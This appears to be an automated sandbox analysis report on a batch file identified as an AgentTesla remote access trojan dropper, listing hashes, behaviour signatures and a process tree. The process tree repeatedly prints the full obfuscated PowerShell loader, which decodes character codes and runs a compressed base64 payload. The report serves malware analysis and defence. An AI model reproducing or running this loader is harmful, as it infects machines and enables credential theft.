Analysis

  • max time kernel
    959s
  • max time network
    923s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-09-2024 00:42

General

  • Target

    message(1).bat

  • Size

    4KB

  • MD5

    e296801aa02e88edcfc6132fbfe05504

  • SHA1

    7bffaaebf505f46a2a5fa352076781e3b70b816b

  • SHA256

    d94d1e06068956048d32860b187a4a5faab782143631660f2d174048f6cae5ae

  • SHA512

    79e27d197a69f40b4e1478dd0020644b7378dcc4455df9f8ad03caf0ebc80e63809b486fd2df57e6978c8fee49bd7192d8b5e4d765803153741d3767c5b04d32

  • SSDEEP

    96:FKBYr6CQ9lrTi8Dsg9jfltpRBTPiQQLNBuZYbzTe/jyDaP3D7uM1I2iJPABY:FJr6CR8wgNlTaLnuqbe/yaP3mM1GPD

Malware Config

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • AgentTesla payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 34 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 44 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\message(1).bat"
    1⤵
      PID:4180
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:2992
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\message(1).bat" "
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:2408
        • C:\Windows\system32\cmd.exe
          CMD.eXE /C pOWErShelL " [stRING]::JoIN('',( '73S69b88<32C40:78m69j87j45b79C66:74C101j67S116b32C73e79n46S99S111n109n112m114<69j115S115<105x79C78n46m68e101n70e76x97m116x69b115<84C114n101n97S77e40n32e91S83n89S83n116j101n109b46b105S111C46C109C101:109:79e82C121x83:84C114<101n97b109<93m32b91C99m79<110b118:69b114b84m93S58x58m70<114:79n77S66e97x115m69b54x52:115S84C82j105<78S103b40C39b98S86S90b116S99x53b112C65<69<80b52e114S102S77C103C85m71x65e120<54e67b118n71:108n110:48j121n107x78<89<107n120S71S84e86S116j77S119n119S122e78:88:112x85S82e107e69C114n50x67j82:83C47x110:118b51S89:79b56e79b116S66b47j48n57e117b55C50n50m100S49m110:88b48m52x86m84C86b86C85b81n47j50e107m97e77<112C52e99b100m104b78<104m52<56C80b106:109:116S53:66<109:121b101S52e116e86x106n83C78b49n87m119S122x79m111b53:102x43n65m106e119S53:97x111n75:121S66<113:74C106:97x99m110:67:69<68<99C106b115n79C109e49C109j97:83m78:76:83m89e98m55x74S97e54j68m111e51e76x112m104:55m106C120x98e83n102e48<98b81j68x86j56x67C68b48e85:98:66S68e113b86j77b68S110x90n106b79j99<72S56:90j74e76S68e72e68b81C81C103:107C80n89:51b82b73b77n57C83:50m106j107:110S121:73C115e85S79x110e118n52S99<117b81j88e111e73<53x83x116:101S98e47x69:76C52C66b73S84<84C73S57e74m99b99S103<47j51S117b113j83<88j48e49S98<99S53n71n88<110S101<74C111m56n108:105x119b90x43:86j97C87b50S108m109:75n82j120S97m117e71x87m104m68:87S105S65C47C107x67S43:70C107m43e75n79x122m47<73x119C47n90m65n69:87C83:75<117:82<53j74<57n84e97e114x104m43b104S75b101j71S76S73m120<115m43n67<48S90<68m83b101S48<81m100C122m52C110e122:90b53e76n98n89m88S87:53x79<101<116x112b75m49x78x106x115e120C49x77b97b70S117b54b53S65S81e101<70n120C83b119n111x70e89x80n110b82x104e72n83n121b102S112m90n75<87x85e81e49n55:116m111x82C110j104S116C49S55b106e50<101b116C66x77x111e72e111m115S87C111S103S108<83:109C82x73:65S89C99<106C117b65S115:70j116n49e73m55x119:82n100j99j77n82C107:90j43x80S79e108e76:75j76n85n52C119C71n97x116b57S71:102j55:90m112<75<116e104:114<118n74S53<77C76<121S55C121j87C48m110j68n97m53:73j87<85j122b81e50S86b66e106n86S79n55m78m75<88m79j81n72:55j75<80S71e65b49b108n104S73:51n80S52:43m104x75n101e49:56x110:78S50C82j99<104C70C99x84j110n53n55:120:105S112m47S122<113b104x51C69m119C77C101m109<119n105m89S66n82:89<113e70:97x87b88<111:109m119C117e113j76:55C67j75:53:78:49:112e76j56n71<112n67S107m73C100x104j73b113x83e108n103:48e77x71b100e76x71n49b76:120m111x83n120m84S103m107j103n87n48m86<90S83C105b77:72x81n83C81m103e109m70C105n99C115j49e98:99b56b50:71e76n99e97m50n72b56e54b67n97e106x99e85j50S114m70b99x55b76x100C53m116e49<50j57C82S110j85m79e50j49<87j100b104S108x86x82m113j102<122:73j85n113e56S77:114e70j100C78e47:105j79b109S101n100b49C56j101n55x109:73:98m111j87S74x83:74:74x80j100x105n113j81C76e101S56m107x117b55j116m88S80b90e113<54S119:90e78:78m78x78C90x52<100S112m55e105C115n56S71m75b100:86x100x47<80x51n56e120<102b74n88:88<101S118n79n122C83C53m113b70x119:87<70m74:112j103S78e74<107n111S104C81<107b52b107e104n48x68C57:120m71:57j88x55x48x77n97S65b120j72m121b81C84m79j101:72C50<88e89b113n48j56C77<115C72<81S84j102m70x48j56<88e109m98j117S69e72x111C50b51n69C120x53m75e75x82x77j110<51<84:85x121x81<72x66m77e75S111n72n69j105m88:85b119e43:52n79n68n74<68m43m84m115m106b80m68<109b107n98n77e89:122x53b89x68S108j73:56j109j105x106:108S116<80j107:121n66x78j74x99j98x121e113n50j77S120:85b122<100m111<43S67n65m101<122:54b119C100:53b72x77S72x71b101n81j106b112m56C104:70:117m53C43S107C47e71m69m75C110x101b121m81e74S70S56S67e81C85j115b75e108b86C66:117e72S47x101j106:68S73m57j122S57:109S69n55b106b98:122n71b48e99e84n112S97S109e53x48m120n107S65m57e114C102C82e76x119j57j87e100S55n72n113x84C55b120:87:116<57b67b69b65x49m83m71S87e71b106x120n51n106:111<51b102<115m87n83e86m107S68x97:108b103e69n67<65S69x65:109<112x71C69m85m112C120<49C76n90b120<106j52S75S102<52x102n104j106S83m52S51C108b85<72e66S100n74x115x54C105:121e107m80b66m52x77e120:116S73:86e88:86x69e66j55S84S119C66n109m106j76m48n115e76m47b51e114S114j111e71x67b109x48e85j83S65x80<65n54S115x57<122S86C100:73S103C113e71C73:51x121m55b112b117<110j79S121j68:54x75:116m88m72:79:87S115e113<56S66C50n66n57j87S55m51n66x107e104e98C102<66<120C111e101e114:75x88<56e87x69j80e120e77m88<48x121b69b100e98j89S75C66n83e122n122m106n73n104x55C83<122C83x104<89j117e113<84j108n71S101e113e55x113:118b56n68b39S32n41b32m44b32C91j115:121j115:116x69<109j46S105S111m46:99C111<109<80m114m69n83C83n105j111<110m46b67m111C77j112j114<69:115j83j105<79b110j77n79j100b69n93j58:58C100b69:99:111b77m80C114n69b115e115:41m124n102:111b114m69n97<67:104x123m32S78e69C87:45:79m66b74b101<67e116m32e73j79n46b115e116<114:101e97n109m114j69C65x100C101C114m40j36C95e32j44<91S83b89<83j116n69j77:46:84j69b88<116:46e101x78j99e111j68<105S110<71<93C58C58m97n115n99j73e105C41<125e32m124x32j102j111n82m69:97m67S72j32<123C36C95b46<114S69n65<68m84e79m69C78:68n40j41j32e125n41'-SpLiT 'n' -SPlIT 'S' -spLIT 'j' -SPLIT 'C' -Split'<' -SPlIt 'e'-spliT'x'-SpLIT':'-SPLIt 'b' -splIt'm'| {( [ChAR] [InT] $_) }) )|. ( $PShoME[4]+$pshome[34]+'x')"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4924
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            pOWErShelL " [stRING]::JoIN('',( '73S69b88<32C40:78m69j87j45b79C66:74C101j67S116b32C73e79n46S99S111n109n112m114<69j115S115<105x79C78n46m68e101n70e76x97m116x69b115<84C114n101n97S77e40n32e91S83n89S83n116j101n109b46b105S111C46C109C101:109:79e82C121x83:84C114<101n97b109<93m32b91C99m79<110b118:69b114b84m93S58x58m70<114:79n77S66e97x115m69b54x52:115S84C82j105<78S103b40C39b98S86S90b116S99x53b112C65<69<80b52e114S102S77C103C85m71x65e120<54e67b118n71:108n110:48j121n107x78<89<107n120S71S84e86S116j77S119n119S122e78:88:112x85S82e107e69C114n50x67j82:83C47x110:118b51S89:79b56e79b116S66b47j48n57e117b55C50n50m100S49m110:88b48m52x86m84C86b86C85b81n47j50e107m97e77<112C52e99b100m104b78<104m52<56C80b106:109:116S53:66<109:121b101S52e116e86x106n83C78b49n87m119S122x79m111b53:102x43n65m106e119S53:97x111n75:121S66<113:74C106:97x99m110:67:69<68<99C106b115n79C109e49C109j97:83m78:76:83m89e98m55x74S97e54j68m111e51e76x112m104:55m106C120x98e83n102e48<98b81j68x86j56x67C68b48e85:98:66S68e113b86j77b68S110x90n106b79j99<72S56:90j74e76S68e72e68b81C81C103:107C80n89:51b82b73b77n57C83:50m106j107:110S121:73C115e85S79x110e118n52S99<117b81j88e111e73<53x83x116:101S98e47x69:76C52C66b73S84<84C73S57e74m99b99S103<47j51S117b113j83<88j48e49S98<99S53n71n88<110S101<74C111m56n108:105x119b90x43:86j97C87b50S108m109:75n82j120S97m117e71x87m104m68:87S105S65C47C107x67S43:70C107m43e75n79x122m47<73x119C47n90m65n69:87C83:75<117:82<53j74<57n84e97e114x104m43b104S75b101j71S76S73m120<115m43n67<48S90<68m83b101S48<81m100C122m52C110e122:90b53e76n98n89m88S87:53x79<101<116x112b75m49x78x106x115e120C49x77b97b70S117b54b53S65S81e101<70n120C83b119n111x70e89x80n110b82x104e72n83n121b102S112m90n75<87x85e81e49n55:116m111x82C110j104S116C49S55b106e50<101b116C66x77x111e72e111m115S87C111S103S108<83:109C82x73:65S89C99<106C117b65S115:70j116n49e73m55x119:82n100j99j77n82C107:90j43x80S79e108e76:75j76n85n52C119C71n97x116b57S71:102j55:90m112<75<116e104:114<118n74S53<77C76<121S55C121j87C48m110j68n97m53:73j87<85j122b81e50S86b66e106n86S79n55m78m75<88m79j81n72:55j75<80S71e65b49b108n104S73:51n80S52:43m104x75n101e49:56x110:78S50C82j99<104C70C99x84j110n53n55:120:105S112m47S122<113b104x51C69m119C77C101m109<119n105m89S66n82:89<113e70:97x87b88<111:109m119C117e113j76:55C67j75:53:78:49:112e76j56n71<112n67S107m73C100x104j73b113x83e108n103:48e77x71b100e76x71n49b76:120m111x83n120m84S103m107j103n87n48m86<90S83C105b77:72x81n83C81m103e109m70C105n99C115j49e98:99b56b50:71e76n99e97m50n72b56e54b67n97e106x99e85j50S114m70b99x55b76x100C53m116e49<50j57C82S110j85m79e50j49<87j100b104S108x86x82m113j102<122:73j85n113e56S77:114e70j100C78e47:105j79b109S101n100b49C56j101n55x109:73:98m111j87S74x83:74:74x80j100x105n113j81C76e101S56m107x117b55j116m88S80b90e113<54S119:90e78:78m78x78C90x52<100S112m55e105C115n56S71m75b100:86x100x47<80x51n56e120<102b74n88:88<101S118n79n122C83C53m113b70x119:87<70m74:112j103S78e74<107n111S104C81<107b52b107e104n48x68C57:120m71:57j88x55x48x77n97S65b120j72m121b81C84m79j101:72C50<88e89b113n48j56C77<115C72<81S84j102m70x48j56<88e109m98j117S69e72x111C50b51n69C120x53m75e75x82x77j110<51<84:85x121x81<72x66m77e75S111n72n69j105m88:85b119e43:52n79n68n74<68m43m84m115m106b80m68<109b107n98n77e89:122x53b89x68S108j73:56j109j105x106:108S116<80j107:121n66x78j74x99j98x121e113n50j77S120:85b122<100m111<43S67n65m101<122:54b119C100:53b72x77S72x71b101n81j106b112m56C104:70:117m53C43S107C47e71m69m75C110x101b121m81e74S70S56S67e81C85j115b75e108b86C66:117e72S47x101j106:68S73m57j122S57:109S69n55b106b98:122n71b48e99e84n112S97S109e53x48m120n107S65m57e114C102C82e76x119j57j87e100S55n72n113x84C55b120:87:116<57b67b69b65x49m83m71S87e71b106x120n51n106:111<51b102<115m87n83e86m107S68x97:108b103e69n67<65S69x65:109<112x71C69m85m112C120<49C76n90b120<106j52S75S102<52x102n104j106S83m52S51C108b85<72e66S100n74x115x54C105:121e107m80b66m52x77e120:116S73:86e88:86x69e66j55S84S119C66n109m106j76m48n115e76m47b51e114S114j111e71x67b109x48e85j83S65x80<65n54S115x57<122S86C100:73S103C113e71C73:51x121m55b112b117<110j79S121j68:54x75:116m88m72:79:87S115e113<56S66C50n66n57j87S55m51n66x107e104e98C102<66<120C111e101e114:75x88<56e87x69j80e120e77m88<48x121b69b100e98j89S75C66n83e122n122m106n73n104x55C83<122C83x104<89j117e113<84j108n71S101e113e55x113:118b56n68b39S32n41b32m44b32C91j115:121j115:116x69<109j46S105S111m46:99C111<109<80m114m69n83C83n105j111<110m46b67m111C77j112j114<69:115j83j105<79b110j77n79j100b69n93j58:58C100b69:99:111b77m80C114n69b115e115:41m124n102:111b114m69n97<67:104x123m32S78e69C87:45:79m66b74b101<67e116m32e73j79n46b115e116<114:101e97n109m114j69C65x100C101C114m40j36C95e32j44<91S83b89<83j116n69j77:46:84j69b88<116:46e101x78j99e111j68<105S110<71<93C58C58m97n115n99j73e105C41<125e32m124x32j102j111n82m69:97m67S72j32<123C36C95b46<114S69n65<68m84e79m69C78:68n40j41j32e125n41'-SpLiT 'n' -SPlIT 'S' -spLIT 'j' -SPLIT 'C' -Split'<' -SPlIt 'e'-spliT'x'-SpLIT':'-SPLIt 'b' -splIt'm'| {( [ChAR] [InT] $_) }) )|. ( $PShoME[4]+$pshome[34]+'x')"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2452
      • C:\Windows\System32\NOTEPAD.EXE
        "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\message(1).bat
        1⤵
          PID:220
        • C:\Windows\system32\CMD.eXE
          "C:\Windows\system32\CMD.eXE" /C pOWErShelL " [stRING]::JoIN('',( '73S69b88<32C40:78m69j87j45b79C66:74C101j67S116b32C73e79n46S99S111n109n112m114<69j115S115<105x79C78n46m68e101n70e76x97m116x69b115<84C114n101n97S77e40n32e91S83n89S83n116j101n109b46b105S111C46C109C101:109:79e82C121x
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:4408
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            pOWErShelL " [stRING]::JoIN('',( '73S69b88<32C40:78m69j87j45b79C66:74C101j67S116b32C73e79n46S99S111n109n112m114<69j115S115<105x79C78n46m68e101n70e76x97m116x69b115<84C114n101n97S77e40n32e91S83n89S83n116j101n109b46b105S111C46C109C101:109:79e82C121x
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:740
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe"
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:1200
          • C:\Windows\system32\cmd.exe
            CMD.eXE /C pOWErShelL " [stRING]::JoIN('',( '73S69b88<32C40:78m69j87j45b79C66:74C101j67S116b32C73e79n46S99S111n109n112m114<69j115S115<105x79C78n46m68e101n70e76x97m116x69b115<84C114n101n97S77e40n32e91S83n89S83n116j101n109b46b105S111C46C109C101:109:79e82C121x83:84C114<101n97b109<93m32b91C99m79<110b118:69b114b84m93S58x58m70<114:79n77S66e97x115m69b54x52:115S84C82j105<78S103b40C39b98S86S90b116S99x53b112C65<69<80b52e114S102S77C103C85m71x65e120<54e67b118n71:108n110:48j121n107x78<89<107n120S71S84e86S116j77S119n119S122e78:88:112x85S82e107e69C114n50x67j82:83C47x110:118b51S89:79b56e79b116S66b47j48n57e117b55C50n50m100S49m110:88b48m52x86m84C86b86C85b81n47j50e107m97e77<112C52e99b100m104b78<104m52<56C80b106:109:116S53:66<109:121b101S52e116e86x106n83C78b49n87m119S122x79m111b53:102x43n65m106e119S53:97x111n75:121S66<113:74C106:97x99m110:67:69<68<99C106b115n79C109e49C109j97:83m78:76:83m89e98m55x74S97e54j68m111e51e76x112m104:55m106C120x98e83n102e48<98b81j68x86j56x67C68b48e85:98:66S68e113b86j77b68S110x90n106b79j99<72S56:90j74e76S68e72e68b81C81C103:107C80n89:51b82b73b77n57C83:50m106j107:110S121:73C115e85S79x110e118n52S99<117b81j88e111e73<53x83x116:101S98e47x69:76C52C66b73S84<84C73S57e74m99b99S103<47j51S117b113j83<88j48e49S98<99S53n71n88<110S101<74C111m56n108:105x119b90x43:86j97C87b50S108m109:75n82j120S97m117e71x87m104m68:87S105S65C47C107x67S43:70C107m43e75n79x122m47<73x119C47n90m65n69:87C83:75<117:82<53j74<57n84e97e114x104m43b104S75b101j71S76S73m120<115m43n67<48S90<68m83b101S48<81m100C122m52C110e122:90b53e76n98n89m88S87:53x79<101<116x112b75m49x78x106x115e120C49x77b97b70S117b54b53S65S81e101<70n120C83b119n111x70e89x80n110b82x104e72n83n121b102S112m90n75<87x85e81e49n55:116m111x82C110j104S116C49S55b106e50<101b116C66x77x111e72e111m115S87C111S103S108<83:109C82x73:65S89C99<106C117b65S115:70j116n49e73m55x119:82n100j99j77n82C107:90j43x80S79e108e76:75j76n85n52C119C71n97x116b57S71:102j55:90m112<75<116e104:114<118n74S53<77C76<121S55C121j87C48m110j68n97m53:73j87<85j122b81e50S86b66e106n86S79n55m78m75<88m79j81n72:55j75<80S71e65b49b108n104S73:51n80S52:43m104x75n101e49:56x110:78S50C82j99<104C70C99x84j110n53n55:120:105S112m47S122<113b104x51C69m119C77C101m109<119n105m89S66n82:89<113e70:97x87b88<111:109m119C117e113j76:55C67j75:53:78:49:112e76j56n71<112n67S107m73C100x104j73b113x83e108n103:48e77x71b100e76x71n49b76:120m111x83n120m84S103m107j103n87n48m86<90S83C105b77:72x81n83C81m103e109m70C105n99C115j49e98:99b56b50:71e76n99e97m50n72b56e54b67n97e106x99e85j50S114m70b99x55b76x100C53m116e49<50j57C82S110j85m79e50j49<87j100b104S108x86x82m113j102<122:73j85n113e56S77:114e70j100C78e47:105j79b109S101n100b49C56j101n55x109:73:98m111j87S74x83:74:74x80j100x105n113j81C76e101S56m107x117b55j116m88S80b90e113<54S119:90e78:78m78x78C90x52<100S112m55e105C115n56S71m75b100:86x100x47<80x51n56e120<102b74n88:88<101S118n79n122C83C53m113b70x119:87<70m74:112j103S78e74<107n111S104C81<107b52b107e104n48x68C57:120m71:57j88x55x48x77n97S65b120j72m121b81C84m79j101:72C50<88e89b113n48j56C77<115C72<81S84j102m70x48j56<88e109m98j117S69e72x111C50b51n69C120x53m75e75x82x77j110<51<84:85x121x81<72x66m77e75S111n72n69j105m88:85b119e43:52n79n68n74<68m43m84m115m106b80m68<109b107n98n77e89:122x53b89x68S108j73:56j109j105x106:108S116<80j107:121n66x78j74x99j98x121e113n50j77S120:85b122<100m111<43S67n65m101<122:54b119C100:53b72x77S72x71b101n81j106b112m56C104:70:117m53C43S107C47e71m69m75C110x101b121m81e74S70S56S67e81C85j115b75e108b86C66:117e72S47x101j106:68S73m57j122S57:109S69n55b106b98:122n71b48e99e84n112S97S109e53x48m120n107S65m57e114C102C82e76x119j57j87e100S55n72n113x84C55b120:87:116<57b67b69b65x49m83m71S87e71b106x120n51n106:111<51b102<115m87n83e86m107S68x97:108b103e69n67<65S69x65:109<112x71C69m85m112C120<49C76n90b120<106j52S75S102<52x102n104j106S83m52S51C108b85<72e66S100n74x115x54C105:121e107m80b66m52x77e120:116S73:86e88:86x69e66j55S84S119C66n109m106j76m48n115e76m47b51e114S114j111e71x67b109x48e85j83S65x80<65n54S115x57<122S86C100:73S103C113e71C73:51x121m55b112b117<110j79S121j68:54x75:116m88m72:79:87S115e113<56S66C50n66n57j87S55m51n66x107e104e98C102<66<120C111e101e114:75x88<56e87x69j80e120e77m88<48x121b69b100e98j89S75C66n83e122n122m106n73n104x55C83<122C83x104<89j117e113<84j108n71S101e113e55x113:118b56n68b39S32n41b32m44b32C91j115:121j115:116x69<109j46S105S111m46:99C111<109<80m114m69n83C83n105j111<110m46b67m111C77j112j114<69:115j83j105<79b110j77n79j100b69n93j58:58C100b69:99:111b77m80C114n69b115e115:41m124n102:111b114m69n97<67:104x123m32S78e69C87:45:79m66b74b101<67e116m32e73j79n46b115e116<114:101e97n109m114j69C65x100C101C114m40j36C95e32j44<91S83b89<83j116n69j77:46:84j69b88<116:46e101x78j99e111j68<105S110<71<93C58C58m97n115n99j73e105C41<125e32m124x32j102j111n82m69:97m67S72j32<123C36C95b46<114S69n65<68m84e79m69C78:68n40j41j32e125n41'-SpLiT 'n' -SPlIT 'S' -spLIT 'j' -SPLIT 'C' -Split'<' -SPlIt 'e'-spliT'x'-SpLIT':'-SPLIt 'b' -splIt'm'| %{( [ChAR] [InT] $_) }) )|. ( $PShoME[4]+$pshome[34]+'x')"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4308
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              pOWErShelL " [stRING]::JoIN('',( '73S69b88<32C40:78m69j87j45b79C66:74C101j67S116b32C73e79n46S99S111n109n112m114<69j115S115<105x79C78n46m68e101n70e76x97m116x69b115<84C114n101n97S77e40n32e91S83n89S83n116j101n109b46b105S111C46C109C101:109:79e82C121x83:84C114<101n97b109<93m32b91C99m79<110b118:69b114b84m93S58x58m70<114:79n77S66e97x115m69b54x52:115S84C82j105<78S103b40C39b98S86S90b116S99x53b112C65<69<80b52e114S102S77C103C85m71x65e120<54e67b118n71:108n110:48j121n107x78<89<107n120S71S84e86S116j77S119n119S122e78:88:112x85S82e107e69C114n50x67j82:83C47x110:118b51S89:79b56e79b116S66b47j48n57e117b55C50n50m100S49m110:88b48m52x86m84C86b86C85b81n47j50e107m97e77<112C52e99b100m104b78<104m52<56C80b106:109:116S53:66<109:121b101S52e116e86x106n83C78b49n87m119S122x79m111b53:102x43n65m106e119S53:97x111n75:121S66<113:74C106:97x99m110:67:69<68<99C106b115n79C109e49C109j97:83m78:76:83m89e98m55x74S97e54j68m111e51e76x112m104:55m106C120x98e83n102e48<98b81j68x86j56x67C68b48e85:98:66S68e113b86j77b68S110x90n106b79j99<72S56:90j74e76S68e72e68b81C81C103:107C80n89:51b82b73b77n57C83:50m106j107:110S121:73C115e85S79x110e118n52S99<117b81j88e111e73<53x83x116:101S98e47x69:76C52C66b73S84<84C73S57e74m99b99S103<47j51S117b113j83<88j48e49S98<99S53n71n88<110S101<74C111m56n108:105x119b90x43:86j97C87b50S108m109:75n82j120S97m117e71x87m104m68:87S105S65C47C107x67S43:70C107m43e75n79x122m47<73x119C47n90m65n69:87C83:75<117:82<53j74<57n84e97e114x104m43b104S75b101j71S76S73m120<115m43n67<48S90<68m83b101S48<81m100C122m52C110e122:90b53e76n98n89m88S87:53x79<101<116x112b75m49x78x106x115e120C49x77b97b70S117b54b53S65S81e101<70n120C83b119n111x70e89x80n110b82x104e72n83n121b102S112m90n75<87x85e81e49n55:116m111x82C110j104S116C49S55b106e50<101b116C66x77x111e72e111m115S87C111S103S108<83:109C82x73:65S89C99<106C117b65S115:70j116n49e73m55x119:82n100j99j77n82C107:90j43x80S79e108e76:75j76n85n52C119C71n97x116b57S71:102j55:90m112<75<116e104:114<118n74S53<77C76<121S55C121j87C48m110j68n97m53:73j87<85j122b81e50S86b66e106n86S79n55m78m75<88m79j81n72:55j75<80S71e65b49b108n104S73:51n80S52:43m104x75n101e49:56x110:78S50C82j99<104C70C99x84j110n53n55:120:105S112m47S122<113b104x51C69m119C77C101m109<119n105m89S66n82:89<113e70:97x87b88<111:109m119C117e113j76:55C67j75:53:78:49:112e76j56n71<112n67S107m73C100x104j73b113x83e108n103:48e77x71b100e76x71n49b76:120m111x83n120m84S103m107j103n87n48m86<90S83C105b77:72x81n83C81m103e109m70C105n99C115j49e98:99b56b50:71e76n99e97m50n72b56e54b67n97e106x99e85j50S114m70b99x55b76x100C53m116e49<50j57C82S110j85m79e50j49<87j100b104S108x86x82m113j102<122:73j85n113e56S77:114e70j100C78e47:105j79b109S101n100b49C56j101n55x109:73:98m111j87S74x83:74:74x80j100x105n113j81C76e101S56m107x117b55j116m88S80b90e113<54S119:90e78:78m78x78C90x52<100S112m55e105C115n56S71m75b100:86x100x47<80x51n56e120<102b74n88:88<101S118n79n122C83C53m113b70x119:87<70m74:112j103S78e74<107n111S104C81<107b52b107e104n48x68C57:120m71:57j88x55x48x77n97S65b120j72m121b81C84m79j101:72C50<88e89b113n48j56C77<115C72<81S84j102m70x48j56<88e109m98j117S69e72x111C50b51n69C120x53m75e75x82x77j110<51<84:85x121x81<72x66m77e75S111n72n69j105m88:85b119e43:52n79n68n74<68m43m84m115m106b80m68<109b107n98n77e89:122x53b89x68S108j73:56j109j105x106:108S116<80j107:121n66x78j74x99j98x121e113n50j77S120:85b122<100m111<43S67n65m101<122:54b119C100:53b72x77S72x71b101n81j106b112m56C104:70:117m53C43S107C47e71m69m75C110x101b121m81e74S70S56S67e81C85j115b75e108b86C66:117e72S47x101j106:68S73m57j122S57:109S69n55b106b98:122n71b48e99e84n112S97S109e53x48m120n107S65m57e114C102C82e76x119j57j87e100S55n72n113x84C55b120:87:116<57b67b69b65x49m83m71S87e71b106x120n51n106:111<51b102<115m87n83e86m107S68x97:108b103e69n67<65S69x65:109<112x71C69m85m112C120<49C76n90b120<106j52S75S102<52x102n104j106S83m52S51C108b85<72e66S100n74x115x54C105:121e107m80b66m52x77e120:116S73:86e88:86x69e66j55S84S119C66n109m106j76m48n115e76m47b51e114S114j111e71x67b109x48e85j83S65x80<65n54S115x57<122S86C100:73S103C113e71C73:51x121m55b112b117<110j79S121j68:54x75:116m88m72:79:87S115e113<56S66C50n66n57j87S55m51n66x107e104e98C102<66<120C111e101e114:75x88<56e87x69j80e120e77m88<48x121b69b100e98j89S75C66n83e122n122m106n73n104x55C83<122C83x104<89j117e113<84j108n71S101e113e55x113:118b56n68b39S32n41b32m44b32C91j115:121j115:116x69<109j46S105S111m46:99C111<109<80m114m69n83C83n105j111<110m46b67m111C77j112j114<69:115j83j105<79b110j77n79j100b69n93j58:58C100b69:99:111b77m80C114n69b115e115:41m124n102:111b114m69n97<67:104x123m32S78e69C87:45:79m66b74b101<67e116m32e73j79n46b115e116<114:101e97n109m114j69C65x100C101C114m40j36C95e32j44<91S83b89<83j116n69j77:46:84j69b88<116:46e101x78j99e111j68<105S110<71<93C58C58m97n115n99j73e105C41<125e32m124x32j102j111n82m69:97m67S72j32<123C36C95b46<114S69n65<68m84e79m69C78:68n40j41j32e125n41'-SpLiT 'n' -SPlIT 'S' -spLIT 'j' -SPLIT 'C' -Split'<' -SPlIt 'e'-spliT'x'-SpLIT':'-SPLIt 'b' -splIt'm'| %{( [ChAR] [InT] $_) }) )|. ( $PShoME[4]+$pshome[34]+'x')"
              3⤵
              • Blocklisted process makes network request
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5032
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe"
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:8
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe"
            2⤵
            • Checks processor information in registry
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3596
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2020 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1940 -prefsLen 23602 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c50bb16e-e73b-42b7-b4f3-13d6adc86877} 3596 "\\.\pipe\gecko-crash-server-pipe.3596" gpu
              3⤵
                PID:2728
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2444 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 23638 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ff7c883-69b6-4d55-8990-b34e1b187251} 3596 "\\.\pipe\gecko-crash-server-pipe.3596" socket
                3⤵
                • Checks processor information in registry
                PID:2292
